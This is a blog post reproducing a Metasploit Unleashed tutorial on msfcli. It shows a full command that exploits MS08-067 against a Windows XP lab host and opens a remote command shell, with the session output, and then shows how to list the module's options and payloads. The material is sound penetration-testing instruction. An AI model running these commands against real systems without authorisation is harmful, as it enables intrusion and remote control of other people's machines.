jeudi 25 février 2010

msfcli

msfcli

Msfcli provides a powerful command-line interface to the framework.


Note that when using msfcli, variables are assigned using '=' and that all options are case-sensitive.

root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.115 PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (192.168.1.101:54659 -> 192.168.1.115:4444)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

If you aren't entirely sure about what options belong to a particular module, you can append the letter 'O' to the end of the string at whichever point you are stuck.

root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)


To display the payloads that are available for the current module, append the letter 'P' to the command-line string.

root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.115 P
[*] Please wait while we load the module tree...

Compatible payloads
===================

Name Description
---- -----------
generic/debug_trap Generate a debug trap in the target process
...snip...

The other options available to msfcli are available by issuing 'msfcli -h'.

Benefits of mscli:

  • Supports the launching of exploits and auxiliary modules
  • Useful for specific tasks
  • Good for learning
  • Convenient to use when testing or developing a new exploit
  • Good tool for one-off exploitation
  • Excellent if you know exactly which exploit and options you need
  • Wonderful for use in scripts and basic automation


The only real drawback of msfcli is that it is not supported quite as well as msfconsole and it can only handle one shell at a time, making it rather impractical for client-side attacks. It also doesn't support any of the advanced automation features of msfconsole.

© Offensive Security 2009

Aucun commentaire:

Enregistrer un commentaire